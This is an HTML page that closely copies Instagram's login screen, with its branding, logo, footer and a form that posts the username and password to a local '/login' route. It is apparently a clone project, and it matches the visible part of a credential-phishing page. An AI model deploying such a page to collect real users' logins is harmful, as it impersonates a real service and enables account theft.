<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Log in • Instagram</title>
    <link rel="stylesheet" href="./css/style.css">
    <link rel="stylesheet" href="./css/resp.css">
    <script src="../Static/js/script.js" defer></script>

</head>

<body>
    <main>
        <div class="container">
            <div class="form">
                <div class="logo">
                    <img src="../Static/img/instagram.jpeg" alt="instagram logo">
                </div>

                <form action="/login" method="post">
                    <div class="all-inputs">
                        <input type="text" required id="email" name="email" placeholder="Phone number, username, or email">

                        <input type="password" requiredsig id="password" name="password" placeholder="Password">
                    </div>
                    <div class="all-buttons">
                        <input class="btn" type="submit" value="Log in" disabled>
                    </div>


                </form>
            </div>
            <div class="link">
                <p>
                    Don't have an account? <a href="//www.instagram.com/accounts/emailsignup/">Sign up</a>
                </p>
            </div>

            <div class="get">
                <div class="para">
                    <p>
                        Get the app.
                    </p>
                </div>
                <div class="icon">
                    <img src="../Static/img/googleplay.jpeg" alt="Google play">
                    <img src="../Static/img/microsoft.png" alt="Microsoft">
                </div>

            </div>
        </div>
    </main>
    <footer>
        <p>
        <pre>
            Meta  About  Blog  Jobs  Help  API  Privacy  Terms  Top Accounts  Hashtags  Locations  Instagram Lite  Contact Uploading & Non-Users
        </pre>
        </p>
        <p>
            &copy 2022 Instagram from Meta
        </p>
    </footer>

</body>

</html>